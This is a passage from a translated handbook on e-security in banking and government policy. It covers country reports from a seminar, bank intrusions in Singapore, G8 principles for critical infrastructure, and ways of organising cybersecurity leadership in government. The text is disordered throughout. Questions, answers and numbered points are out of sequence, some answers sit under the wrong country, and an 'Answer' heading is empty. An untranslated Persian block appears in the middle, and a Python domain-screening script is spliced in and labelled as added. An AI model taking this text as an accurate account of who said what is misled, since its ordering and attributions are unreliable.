2. Which processes do the financial institutions in your country currently follow to mitigate e-security risks, and what changes do they plan to make to their oversight process?

3. How can multilateral and multinational institutions, working with other supervisory organisations, help you?

In answer to this question a representative of Singapore proposed heavy administrative penalties and the updating of regulations at regular intervals, because he believed that laws such as the "Computer Misuse Act" have proved their worth in identifying computer crime and reducing its appeal to amateur intruders.

A representative of the FBI also stated that this is an international social phenomenon that does not depend on borders. In some cases the offender does not recognise the seriousness of the crime he is committing. Indeed, some people do not accept computer crime as real crime. In addition, banks, in order to attract more customers, behave as though they had made the myth of security permanent. The general public therefore needs to be given a better understanding of the risks of financial services and electronic commerce, because in this area holding information back only makes the problems more acute. In particular, there are enormous problems connected with the cross-sector nature of electronic crime, including cyber intrusions and tampering with bank sites. International cooperation is therefore necessary in this area.

Brazil

The representative of Brazil pointed out that competition drives companies to build advanced technologies, but that these technologies are prone to vulnerabilities. There is a balance between the costs of services on the one hand and fraud on the other. The efficiency of the techniques for holding examinations for training courses in Brazil is increasing.
In answer to the question of how multinational institutions can help countries, the Brazilians wished to be helped in the following areas: holding examinations for training courses, drawing up security guidelines and standards, and creating security models with a minimum of banking regulation.

Question

The Brazilians asked how a legal infrastructure for dealing with crime can be created, given the dynamic nature and rapid progress of technology, which has made legislation difficult.

Mexico

In answer on the possible trends in e-security incidents, Mexico pointed out that the possibility of obtaining PINs through the web is increasing and that this makes the risks more serious. In any case they are making great efforts to reduce electronic risks; financial institutions have strong control capacities, and there are many security and audit firms that specialise in information technology. In addition, Mexico has taken the BASEL recommendations into account for the control of technology risks.

In answer to the third question, the Mexicans proposed that global information be exchanged between the various organisations in order to share experiences, assessments, and needs.

1. What trends do you see in e-security incidents? What are the biggest challenges or vulnerabilities? (Identity theft, denial of service, Internet money laundering, or other forms of electronic fraud)

Answer

Question

Mexico asked about the depth of Singapore's policies.

Answer

Singapore's general security practices are available on the Internet [237]. These policies comprise 26 activities in the areas of operating systems, patches, roles and responsibilities, antivirus software, firewalls, and so on.
Colombia

The representative of Colombia stated that their security problems are the same as those of other countries and that they too see themselves as vulnerable. The country currently has no standard for incident response, and no computer security emergency response centre has been set up there. Colombian clients are prone to becoming victims of attacks; identity theft is on the rise; bank cards are forged; there is no law guaranteeing confidentiality; risk mitigation is left entirely to the auditors; PKI and smart cards are in use, but the e-security of banks is at a rudimentary level; employees usually disregard security instructions, and security does not have its proper place in Colombian banking culture; and on top of all this, keeping up to date is also a fundamental problem in the country.

Multilateral institutions clearly have a fundamental role in this area. UNCITRAL, for example, has a model law for computer crime in areas such as harassment, denial of service, and transactions. The characteristic of model laws is that, unlike ordinary laws, they must be based on civil law.

Question

The representative of Colombia asked how the integrity of security in financial institutions is called into question, particularly with profit and loss considerations in mind. Matters such as liability and risk management are fundamental concerns, especially when customers are taken into account.

Answer

Because of jurisdictional considerations, cooperation between different organisations is necessary even to determine where a crime took place. As a start, a common language for describing the problems, the measures for mitigating them, and cross-sector standards must be drawn up. The definition of "fraud" in the European Union, for example, ran into difficulties. One example of a cross-sector organisation active in this area is the Financial Action Task Force (FATF) [238], which combats money laundering and terrorism.

[237] http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/Singpore_TRMguidelines28Feb03/$FILE/Singpore_TRMguidelines28Feb0
Ukraine

After Ukraine's independence, changes took place in the country's banking system that led to the use of electronic technologies in it. Security technologies such as electronic signatures and cryptography are administered by the National Bank [239]. Since independence, laws on electronic signatures and electronic transactions have come into force. Despite some attempts to break into the banking system, no particular loss has been reported so far.

In the area of law, Ukraine signed the Convention on Cybercrime in 2001 and from then on began to prosecute computer misuse. In addition, the country's parliament has passed a law on the protection of personal information. The criminal code also addresses cybercrime, but these laws nevertheless have little effect, because before they can be applied the elements of "wilfulness" and "intent" in committing the crime must be proved. As a result, inadequate prosecution of crime has become routine, since it is genuinely difficult to present evidence acceptable to a court that such crimes were deliberate. The security staff of the law enforcement agencies must receive adequate training in collecting evidence of crime.

Question

Ukraine's main question was about achieving accountability and commitment through internal oversight and reporting mechanisms. The reporting of incidents by bank officers, for example, is necessary for the security of a bank. To support the capacity to respond to incidents, a computer security emergency response centre has been created in Ukraine.

Answer

APEC's cyber security programme will also address wireless technology, and will briefly deal with the risks of technologies such as Wi-Fi.

Third, by the end of October 2003 computer security emergency response centres will be established in all APEC member countries.

[238] Financial Action Task Force

[239] In this country all banks are considered part of the National Bank system.
Australia

Australia raised three key points.

First, by October 2003 all APEC member countries will have laws on cybercrime, covering matters such as electronic fraud and the cross-sector and international enforcement of electronic laws.

Second, training and cooperation in law enforcement are needed at every level, and information technology standards will be included in summary form in these courses.

Australia has selected and implemented BASEL2 for classifying information. Even so, they have found that the growing use of intrusion detection systems is not particularly easy, given the many false positives and untuned systems. New technologies are built on top of earlier ones, which adds to the complexity of systems and their dependence on one another. At the same time, the way the systems work may not have been well documented. Learning how systems depend on one another is vital, but the documentation available is usually very limited. The representative of Australia pointed out that in that country free training material on general and specialised topics is available for download.

China, Beijing

Despite the unfavourable security situation, Internet banks in China are growing rapidly. Between 1999 and 2003 the number of these banks went from one to twenty-seven, and the volume of banking activity grew more than 100-fold. It was noted that Internet banking flourished during the SARS outbreak. Finally, China put forward the following proposals:

1. Encouraging the sharing of information at national and international levels
2. Creating international e-security standards
3. Increasing transparency in electronic banking

China, Hong Kong

In Hong Kong, fake e-mails, viruses, and worms are very common. Alongside these problems, the behaviour of attackers has also changed. Instead of the banks being targeted directly, the weakest link, that is the customer, has come under attack, and so educating customers is vital.
An incident that recently occurred on a website belonging to a fake bank made the security problems more apparent. This bank had put an incomplete postal address on the website and did not use a digital certificate either, and it also claimed to have offices in New York and elsewhere; but inspections showed that both the website (which was hosted in China) and the claimed bank were fake. This event once again revealed the vital need for cross-sector cooperation, particularly because cybercriminals themselves operate across sectors.

On the subject of evidence acceptable to a court, it was pointed out that electronic data are liable to be destroyed quickly, and that in the area of computer crime there is no standard for legal evidence. Although the world needs guidelines for digital forensic investigation, there is currently no standard method accepted by the courts.

The representative of China stated that public awareness of the place of e-security must be raised and that more external assessments are needed to achieve this. One of the main problems China faces in e-security is the lack of awareness and of management capability for assessing risk (particularly in view of the complex nature of the technologies). In China this problem has been made worse by weak cooperation between the regulatory bodies and the supervisory bodies.
Hong Kong is preparing the groundwork for overseeing and educating customers, for example by publishing guides to raise public awareness of the critical aspects of e-security and by issuing warnings to counter computer crime. To improve e-security oversight it keeps in close contact with domain registrars [240] and uses an automated process to check local domain names (.hk): if the word "bank" or any other form of it is used in a domain name, the matter is immediately referred to the competent authorities for review. The police, the computer security emergency response centre, and the government of Hong Kong also cooperate with various bodies at the international level to build a capability for rapid incident response. A supervisory control self-assessment (CSA) [241] system exists in some 70 to 80 banks, and because of the particular problems of annual assessment, this assessment is also carried out automatically.

Republic of Korea

Although Korea was unable to take part in this global discussion, it answered the questions posed by the World Bank. They pointed out that although Korea has advanced information networks, their level of security still has room for improvement. In Korea 65% of stock exchange transactions are carried out over the Internet, and about 25 million people use the Internet. Recent incidents such as the damage done by the Slammer worm in January 2003 had a severe impact in Korea and exposed the fragile nature of networks.

Korea presented statistics that showed people's low level of awareness of system security. According to the Ministry of Information and Communication, only 12.9% of e-commerce companies, 16.7% of educational institutions, and 9.2% of other organisations have a department for information security. Korea pointed out that many companies see e-security as a vague cost that is only met when sufficient resources and time are allocated. For example, only about 12.9% of e-commerce companies and 6.1% of all companies in the country use intrusion detection systems to protect themselves.

[240] Domain Registrar

[241] Supervisory Control Self-Assessment
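The automated .hk name check described for Hong Kong above can be sketched as follows. This is an added example, not code from the handbook or from any registrar: the keyword variants, the look-alike table, and the sample registrations are assumptions constructed for illustration, and the screening goes slightly beyond the text by also catching disguised spellings.

```python
import unicodedata

# Assumed variants; the text only says the word "bank" or any other form of it.
KEYWORDS = ("bank", "banc", "banque")

# Assumed look-alike substitutions (digits and a few non-Latin letters).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "8": "b",
    "\u0430": "a",  # Cyrillic small a
    "\u03b1": "a",  # Greek small alpha
    "\u043a": "k",  # Cyrillic small ka
})


def to_unicode(name):
    """Decode punycode (xn--) labels so an IDN is screened as it is displayed."""
    try:
        return name.encode("ascii").decode("idna")
    except UnicodeError:
        return name  # already Unicode, or not decodable: screen it as given


def skeleton(label):
    """Comparison form of a label: accents, look-alikes and hyphens removed."""
    decomposed = unicodedata.normalize("NFKD", label)
    base = "".join(c for c in decomposed if not unicodedata.combining(c))
    return base.translate(CONFUSABLES).replace("-", "")


def screen_domain(name, tld="hk"):
    """Return a referral record if a name under the TLD contains a keyword.

    A hit is a referral for human review, not a verdict: unrelated words
    that happen to contain a keyword are flagged too.
    """
    name = name.strip().lower().rstrip(".")
    labels = to_unicode(name).split(".")
    if labels[-1] != tld:
        return None
    for label in labels[:-1]:
        plain = next((k for k in KEYWORDS if k in label), None)
        if plain:
            return {"domain": name, "keyword": plain, "match": "plain"}
        hidden = next((k for k in KEYWORDS if k in skeleton(label)), None)
        if hidden:
            return {"domain": name, "keyword": hidden, "match": "disguised"}
    return None


def screen_batch(names):
    """Screen a list of new registrations and keep only the referrals."""
    return [hit for hit in map(screen_domain, names) if hit]


# Constructed sample of new registrations (not real data).
SAMPLE_REGISTRATIONS = [
    "examplebank.com.hk",
    "secure-b4nk.hk",
    "teahouse.hk",
    "ban-k.org.hk",
    "examplebank.com",
]

if __name__ == "__main__":
    for hit in screen_batch(SAMPLE_REGISTRATIONS):
        print(hit)
```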
Sri Lanka

The representative of Sri Lanka stated that threats such as worms and wireless vulnerabilities exist in the country, but that the Sri Lankan authorities have so far received no reports of attacks on banking systems. The country has been using ATMs for about 20 years. Although electronic banking in Sri Lanka is at an early stage, it is spreading rapidly. Shares and money can be exchanged over the Internet, but these facilities too are still in the early stages of their development. At present the most important security incident in Sri Lanka is the theft of user IDs and passwords. For financial services institutions the level of risk awareness is a key issue, and risks must also be assessed carefully.

Cyber security in Singapore's financial sector

Tony Chew [242], director of technology risk supervision at the Monetary Authority of Singapore (MAS) [243], gave a brief overview of the basics of cyber security. He opened by saying that his department's responsibility is to "inform institutions, supervise them, or be strict with them". Singapore is working to become an international centre for financial services, and for that reason information technology security is of particular importance to it.

Singapore's largest banks were attacked by intruders in 2001 and 2002, which shows the country's urgent need for guidelines on mitigating security risks. In 2001 Singapore's largest bank (UOB) discovered an intruder in its Internet banking system. Although most of the information about this incident remained confidential, it emerged that intruders from Eastern Europe had attacked the banking system. The bank's data were examined and the banking system was manipulated in order to update customers' accounts. It not only took the specialists several months to find the root of the problem, but a great deal of effort and considerable expense also went into finding out who or what had caused it.

[242] Tony Chew

[243] Monetary Authority of Singapore
One fundamental weakness that played a part in all of these incidents was the use of single-factor authentication. Even now most ATMs use very basic authentication methods, and it would take only one or two terrible incidents to force the banks to rethink this. There is also a kind of excessive trust and confidence in SSL technology; but the security that SSL provides is very limited, because it protects information only while it is in transit, and not at the source or the destination. Databases and other storage media must always be kept in encrypted form so that their security is guaranteed.

The Monetary Authority of Singapore drew up "Technology Risk Management Guidelines" for financial services institutions, comprising 26 recommendations on building layered security. The three main categories of these guidelines are:

1. Establishing a sound process for risk management
2. Strengthening availability, security, and recoverability
3. Using strong cryptography to protect data

In addition to drawing up policies on technology, the Monetary Authority of Singapore required banks to carry out penetration testing and an assessment of the working environment at least once a year. The Authority has a technology risk assessment team and a system for rating the banks in Singapore's economic system, which is based on six criteria set by the Authority. These criteria divide institutions into five categories by level of security, where number 1 denotes the most secure and number 5 the least secure. Banks are required to achieve at least grade 2 in this assessment, and they must also have a rapid recovery and restoration plan for their systems. To create an incentive for improving bank security and to instil a sense of standardisation, the results of this rating are published. In addition, banks are required to report every security incident.

As the use of mobile payment devices grows, the vulnerabilities of wireless technology must also be taken into account. Security practices in wireless banking in Singapore are currently still under review.

Summary of questions and proposals

The closing recommendations and questions covered the key points of this global seminar.
In 2002 another attack took place, on Singapore's second largest bank (DBS). In this incident the intruders were able to target customers' systems because of network sharing features and inappropriate system configuration. The intruders planted Trojan horses and keystroke loggers in the accounts of 21 of the bank's customers, which allowed them to obtain personal identification numbers (PINs) and user identification numbers. The incident caused losses of 62,000 dollars to customers' accounts, but the notable point is that its negative effect on public opinion was far greater than that, because the country's newspapers wrote about it for a month. Incidents of this kind can lead to a crisis of public confidence in Internet banking systems.

Strong encryption must also be used for PINs; but this alone is not enough, because PINs are short and intruders can easily obtain them.

First, information and awareness play a vital role in educating the public about current security needs. Government regulations such as "mandatory reporting of suspicious activity" are useful only if they reach the stage of implementation.

Second, transparency and the publication of information about incidents are very important for raising the level of security of future systems. It was pointed out that news coverage of events can sometimes be harmful, because customers are in any case influenced by the press. Instead, companies must correct the situation quickly. Dealing with the problem by drawing up an action plan is a better way of confronting a security breach. The main question that arises here is how far and at what point this information should be published. Other parts of this book offer approaches to this question.

This organisation can be regarded as an example of how to build communication in the field of information technology security.
Third, most of the participating countries stressed the need for cross-sector cooperation. One area in which cooperation will be fruitful is certification programmes. Here organisations must work with the software community so that the security needs of each sector can be identified. EBG, one of the communication and information networks, and InfraGard, a public-private network belonging to the FBI, are two examples of institutions of this kind. InfraGard covers all the critical infrastructures and has about 10,000 members. The aim of this organisation is to build trust and encourage the sharing of information among its members.

Fourth, in order to bring about a form of accountability in e-security, roles and responsibilities must be defined; drawing up a standard of care and of fiduciary duty for the organisations of the electronic economy is therefore a very important matter. The topics under this heading are deposits and transactions, public trust, and confidence in financial services systems.

Finally, outsourcing was one of the participants' major concerns. An example of the problems in this area occurred in 2001, when a web hosting company in the United States was breached and the security of more than 300 banks was compromised as a result. More detail on outsourcing can be found in other parts of this book and in the other sources referred to in the appendices.

In closing, we note that for legislators and inspectors a reassessment of the regulatory umbrella (particularly with regard to the transfer of money by third parties, such as web hosting companies) is vital.
Information technology security and government policy

Chapter 1. Introduction
Chapter 2. Protecting government systems
Chapter 3. The role of law and government policy in the private sector
Chapter 4. Government cyber security policies

Chapter One
Introduction

As in other areas that affect the Internet, government policy plays an important role in information technology security. One must nevertheless speak with caution here: a general policy framework can strengthen security, but the problems caused by ill-conceived government regulation outweigh the benefits of such regulation. Technology is changing rapidly, and new cyber threats [1] spread so quickly that government regulations can easily become obstacles to rapid, innovative responses. The best course is therefore to find a point of balance between regulatory and non-regulatory measures. To reach such a balance, policymakers must take account of some of the inherent and unique characteristics of the Internet. Compared with earlier information and communication technologies, cyberspace [2] is a decentralised space. Part of the power of the Internet comes from the fact that it has no gatekeeper and that most of its functionality lies at the edges of the network rather than at its centre. Government cyber security policies must take these characteristics of the Internet into account. This chapter sets out a series of steps that governments can use, independently of technical decisions, to improve the security of their computers [3].
Although the situation differs from one country to another, in many countries some or all of the components of the communication networks, and many important and sensitive infrastructures that depend on computer systems (banking, transport, energy, manufacturing, and so on), are owned and operated by the private sector [4]. Most of the responsibility for ensuring the security of these systems therefore lies with the private sector. Even so, the existence and proper functioning of such systems are essential to national welfare, and they are usually used where demand for them is greatest, so the government pays close attention to them. Governments usually have their own computer systems, including the computers used for national security, emergency services, health, and other essential functions, and these often depend on private communication networks. Overall, many of the computer systems of private companies and government organisations depend on the same software and hardware, designed and built by private companies, and so their security is a matter that deserves attention.

For all these reasons, responsibility for the security of these systems is shared between the government and the private sector. As a first priority, the government is responsible for "putting its own house in order"; that is, it must apply sound security practices to improve the security of its own systems. In addition, it is recognised worldwide that the government must use the force of criminal law to punish and deter attacks on private sector systems as well as on government systems.

[1] Cyber Threats

[2] Cyberspace

[3] For more information, see the following sites:
http://www.abanet.org/abapubs/books/cybercrime
http://www.isn.ethz.ch/crn
ﻓﺮﺍﺗﺮ ﺍﺯ ﺁﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﻭﻟﺘﻬﺎ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛﻪ ﺑـﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳﺪ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﻀﺎﻋﻔﻲ ﺭﺍ ﻣﺘﺤﻤﻞ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﺍﺗﺨﺎﺫ ﺷـﻮﺩ ﻛـﻪ ﺑﺎﻋـﺚ ﻧﺸﻮﻧﺪ ﻗﻮﺍﻧﻴﻦ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﻣﺠـﺎﻝ ﻇﻬـﻮﺭ ﺍﺑﺘﻜـﺎﺭﺍﺕ ﻭ ﻧﻮﺁﻭﺭﻳﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ ،ﺑﻠﻜـﻪ ﺩﺭﻋـﻮﺽ ﻣﻨﺠـﺮ ﺑـﻪ ﺣـﺪﺍﻛﺜﺮ ﺷـﺪﻥ ﻣﺰﺍﻳﺎﻱ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﮔﺮﺩﻧـﺪ .ﺩﺭ ﻳـﻚ ﻓـﻀﺎﻱ ﻫﻤﻜﺎﺭﻱ ،ﻧﻘﻄﻪ ﺗﻌﺎﺩﻟﻲ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ: • ۴ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻛﺎﺭ ﻛﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺴﻮﻱ ﺍﻣﻨﻴـﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺗﺮﻏﻴﺐ ﻣﻲﻛﻨﺪ ﺗـﺎ ﺳـﻮﺩ ﺑﻴـﺸﺘﺮﻱ ﻛﺴﺐ ﻛﻨﻨﺪ؛ ﻼ ﺟﺪﻳـﺪ ﺍﺳـﺖ ،ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻛﺸﻮﺭﻫﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﻣﺴﺌﻠﻪﺍﻱ ﻛـﺎﻣ ﹰ ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨـﺎ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ،ﻭ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺑــﺎ ﻃﻴــﻒ ﻛــﺎﻣﻠﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺳــﻨﺘﻲ ﻣــﺮﺗﺒﻂ ﺑــﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﺩﺳﺖ ﺑﻪ ﮔﺮﻳﺒﺎﻥ ﻫﺴﺘﻨﺪ ،ﺑﺘﺎﺯﮔﻲ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﻧﻴﺰ ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻨﺪ. ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٣٢ • • • • ﺗﺤﻘﻴﻘﺎﺕ ﺩﻭﻟﺘﻲ ﻭ ﺁﮔﺎﻩﺳﺎﺯﻱ؛ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﻨﺪ؛ ﻣﻔﺎﻫﻴﻢ ﻗﻮﺍﻧﻴﻦ ﺳﻨﺘﻲ ﻛﻪ ﻭﺍﺭﺩ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ؛ ﻭ ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺑـﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻤﺮﻛﺰ ﻳﺎﻓﺘﻪﺍﻧﺪ. 
The notion of "computer security policy" can be seen as part of a broader subject, "the role of law in building trust on the Internet." Creating a trustworthy environment in cyberspace requires adapting laws and government policies from other fields to the domain of cyber security. These fields include consumer protection [5], data and communications privacy [6], intellectual property rights [7] and the e-commerce framework [8]. In the offline world, the law provides protections for commercial transactions and for consumers. Most of these laws can be applied in cyberspace as well, but countries seeking to expand information and communications technology (ICT) should examine whether there are gaps in their laws that stand in the way of the trust needed to improve the security of cyberspace. In fact, countries interested in expanding e-commerce may find that their laws on financial services, cyber property and consumer protection do not provide the trust or support needed for offline transactions. Reform of cyber laws may be carried out as part of reforms to more general laws. This book focuses on those laws and policies that directly address attacks on computer systems (some of which are described in Part Three and in the appendices) and leaves questions about the broader ICT and e-commerce framework to other sources. [9]

[5] Consumer Protection
[6] Data & Communications Privacy
[7] Intellectual Property Rights
[8] E-Commerce Framework
[9] The global Internet policy initiative has a section covering the full range of security issues that affect ICT development.

In addition to an introductory discussion concerning developing countries, this part describes in detail programs and policies that reflect the laws of many developed countries and multinational organizations. The points raised have been updated with reasonable accuracy. Nevertheless, the focus on the resources and models of developed countries and international bodies should not deter other countries from studying the matter further. It is very important that every country develop, advance and adopt an appropriate framework for its own e-security [10]. Available financial and human resources differ, and developing countries need to approach the subject at a basic level; but the principles stated here apply worldwide. It should always be remembered that cyberspace and cyber security are not confined by national borders.

The Concept of Critical Infrastructure

In a number of countries, the government's response to computer security problems has come under the heading of critical infrastructures [11]. A critical infrastructure is a network of physical assets and systems that plays a significant role in a country's economy or welfare. For example, the financial services network is a critical infrastructure comprising all private banks, the central bank, commodity exchanges, check clearing organizations and other institutions involved in financial and credit services. In almost every country in the world these operations are carried out using computers. The transportation network is another critical infrastructure, made up of roads, bridges, canals, railways and airports. Transportation infrastructure is largely physical and mechanical, but the proper functioning of traffic lights, the opening and closing of bridges, the dispatching of trains and air traffic control all depend on computers working correctly.
There is no fixed definition of the critical infrastructure sectors, and the list of critical infrastructures used by policymakers varies from country to country and from time to time. The United States government's cyber-security strategy, published in February 2003, identifies 13 critical infrastructure sectors: 1) agriculture, 2) food, 3) water, 4) public health, 5) emergency services, 6) government, 7) defense industry, 8) information and telecommunications, 9) energy, 10) transportation, 11) banking and finance, 12) chemicals and hazardous materials, and 13) postal services and shipping. [12] By comparison, Canada's critical infrastructure protection strategy names only six sectors: 1) communications, 2) government, 3) energy and utilities, 4) services (which in Canada include financial services, food distribution and health care), 5) security, and 6) transportation. [13] How a country defines its critical infrastructures matters less than understanding the concept of critical infrastructure. [14]

The concept of critical infrastructure is important for several reasons. First, it helps make clear why computer security matters. If policymakers understand that when computers fail, money in the banks cannot be paid out, trains cannot leave the station and even drinking water will not be pumped, they will be better able to grasp the consequences of security problems. Second, the infrastructure sectors matter because they help define the responsibilities of communities, and they bring together communities of common interest that need to cooperate with one another to improve security. For example, electric power industry operators and government advisers can work together to play a positive role in fixing vulnerabilities in the power system. Computer security measures, including identifying best practices [15] and sharing information about vulnerabilities, can to some extent be applied within existing institutions and industry lines. In the private sector, these institutions include trade associations, standards organizations and other organizations that oversee various industries. In the public sector, most countries carry out cyber-security policy through ministries and regulatory agencies (such as those that have traditionally regulated the banking, telecommunications and energy sectors).

At present there are a number of large pioneering companies that cooperate in this area on a larger scale. For example, in May 2003 the G8 identified 11 principles to be taken into account in developing strategies for reducing risk to critical information infrastructure. [16] The principles are as follows:

1. Countries should have emergency warning networks for cyber threats and incidents.
2. Countries should raise their level of awareness and knowledge so as to help people understand the nature and extent of their critical information infrastructure, and should define their role in protecting this information.
3. Countries should examine their infrastructures and identify the interdependencies among them, thereby enhancing the protection of those infrastructures.
4. Countries should increase partnership between the public and private sectors, and should analyze and share their important infrastructure information, so that they can prevent damage as far as possible and respond to the damage that does occur.
5. Countries should create and maintain dedicated crisis communication networks and test them to make sure that they remain secure and stable in emergency situations and can be used.
6. Countries should ensure that data availability [17] policies also take into account the security of critical information infrastructures.
7. Countries should facilitate the tracing of attacks on critical information infrastructures and, at the appropriate time, release the tracing information to other countries that request it.
8. Countries should conduct training and exercises to enhance their response capability, should test their contingency plans for the event of an attack, and should encourage everyone else to carry out similar activities.
9. Countries should ensure that they have appropriate laws and acceptable procedures for dealing with security problems, and should coordinate these investigations with other countries as effectively as possible (for example, the laws adopted in the Council of Europe Cybercrime Convention [18] in November 2001, which prepared trained personnel to assess and trace attacks carried out against critical information infrastructures).
10. Countries should, at the appropriate time, take part in international cooperation to secure their critical information infrastructures, including establishing emergency warning systems, sharing and analyzing information on vulnerabilities and incidents, and cooperating with regard to attacks on such infrastructures, all with due regard for local laws.
11. Countries should increase their national and international research and development and, on the basis of international standards, encourage the use of security technologies.

[10] E-Security
[11] Critical Infrastructures
[12] The National Strategy to Secure Cyberspace [U.S.], http://www.whitehouse.gov/pcipb, http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
[13] Office of Critical Infrastructure Protection & Emergency Preparedness [Canada], http://www.ocipep.gc.ca/home/index_e.asp
[14] For details of how various countries have responded to the issue of protecting critical infrastructures, see the International Critical Information Infrastructure Protection Handbook. The book was produced at the Center for Security Studies and Conflict Research of the Swiss Federal Institute of Technology: http://www.isn.ethz.ch/crn
[15] Best Practices
[16] For more information, see: http://www.cybersecuritycooperation.org/documents/G8_CIIP_Principles.pdf
What is unique about computer security is the interconnection among sectors, including their use of the same or similar hardware and software, and their dependence on a common communications network. Governments should therefore make policy in a way that ensures that information about vulnerabilities and solutions is shared across the infrastructure sectors. This can be achieved by designating a lead office within government for the central coordination of cyber-security programs and policies, a subject we return to later in this part.

Chapter Two
Protecting Government Systems

All the topics examined in Part Three for small and large organizations (SMEs) apply to government systems as well. Just as companies need to protect themselves, their suppliers and their customers, government must protect its systems and its citizens against physical threats and cyber-security threats. Local and national governments cannot prevent severe crises such as interruptions to computer operations, the loss of confidential data or the theft of computer resources. News of security incidents reaching the public erodes public trust and becomes an obstacle to the progress of e-government [19] initiatives. Therefore, as noted in the previous chapter, government's first responsibility in computer security is usually to "put its own house in order"; that is, government agencies at all levels (national, regional and local) must protect the computer systems they use. This covers the computer systems used by government agencies and ministries, including the military and police forces, public health agencies, emergency response centers and central banks. Depending on what is considered public and what private, computer-dependent government infrastructure may include water systems, hydroelectric dams, air traffic control systems and other facilities.

Leadership and Organization

Setting up a national structure for computer security confronts government with organizational challenges, including how that structure should be led. To assign responsibilities within government, one must first answer this question: from the standpoint of the economy, of national security or of the governing regulations, is computer security regarded as a significant matter?

In answering this question, it is worth knowing that:
• Canada has allocated substantial funding for cyber security [20] to its defense ministry. [21]
• In Britain, the Home Office [22], which is responsible for law enforcement, has the lead. [23]
• The United States has placed the matter in its homeland security department, but has deliberately and consciously retained the Computer Security Division of the National Institute of Standards and Technology [24] under the Department of Commerce. [25]
• Australia has established an E-Security Coordination Group to coordinate cyber-security policy; it is an executive agency created by the National Office for the Information Economy and overseen by the Ministry for Communications and Information Technology. [26]
• Italy has established an interministerial committee for the responsible use of the Internet, managed by the Department for Innovation and Technology in the Prime Minister's office.
• In 2000 the Prime Minister of Japan set up a group within the Cabinet to deal with IT security, so as to better coordinate security measures and policies among ministers and agencies. The group was made up of experts drawn from the relevant agencies and ministries as well as the private sector. [27]

Where leadership for e-security is located within government matters a great deal. For example, deciding when to release information about cyber-security vulnerabilities to the public requires weighing many considerations. Placing this responsibility in the defense ministry, which is usually responsible for guarding national security secrets, may hamper disclosure and result in too little information being released to raise public awareness. Because cooperation between the public and private sectors is an important component of what we believe to be the most effective computer security strategy, it may be better to place cyber-security leadership in an economic agency or a government-affiliated company, under the supervision of the country's highest executive authority.

More important than which agency or agencies should be responsible for computer security, however, is that some form of "national leadership" be established to ensure that computer security receives adequate attention from all parts of government. When we consider introducing computer security into existing ministries, important organizational questions arise that need suitable answers. If the only power of the lead cyber-security agency is to exhort people and publish information, its practical authority over the security of other ministries will be limited. Mechanisms are therefore needed that allow cyber-security leaders to establish security in the existing systems of agencies and ministries. One way to compel ministries to comply with computer security standards would be to give an official in the government's central security office the power to reject purchase orders from government agencies that have not complied with security standards. The United States has adopted this approach to some extent, giving the President's Office of Management and Budget the right to approve or reject capital spending on computer systems on various grounds, including security. Another measure would be to require ministries and government agencies to conduct an annual cyber-security audit and report the results to the cyber-security office. Whatever structure is chosen, its senior official should be appointed by the office of the president or prime minister so that all departments and agencies take it seriously.

[17] Data Availability
[18] Council of Europe Cybercrime Convention
[19] E-Government
[20] Cyber-Security
